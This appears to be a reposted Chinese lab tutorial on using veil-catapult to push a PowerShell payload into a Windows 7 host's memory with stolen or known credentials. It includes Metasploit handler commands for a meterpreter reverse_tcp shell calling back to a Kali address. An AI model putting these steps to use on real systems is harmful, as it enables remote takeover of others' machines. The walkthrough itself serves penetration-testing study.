首页 > 代码库 > veil-catapult
veil-catapult
veil-catapult进行payload投放,直接使payload在内存中执行。
powershell工作原理:从kali先发一个powershell脚本到目标主机上,再发一个反弹shell到目标主机,再发一个指令给powershell,powershell通知反弹shell连接kali,之后就建立连接了
缺点:兼容性较差
kaliIP:192.168.1.119
目标IP:192.168.1.121
veil-catapult
通常选1、2,如果使用标准的payload就选1,已经想使用自己的payload就选2。
这里选1
先生成powershell
选1
在win7上是有powershell的运行环境的,直接在运行输入powershell
设置IP,目标用户名密码,执行形式
回车
生成反弹shell的payload
选1
设置反弹的IP,端口
然后就生成好了,生成的payload并没有保存到本地,而是存在内存中,回车注入到目标主机的内存中,使目标主机反弹连接到kali
但是kali并没有打开侦听,所以并没有连接成功,所以我们先打开msf的侦听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
设置反弹的IP,和端口,以线程的注入方式
set lport 4444
set lhost 192.168.1.119
set EXITFUNC thread
show options
exploit执行侦听
msf执行侦听后,再对目标按照以上步骤进行payload投放
veil-catapult
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。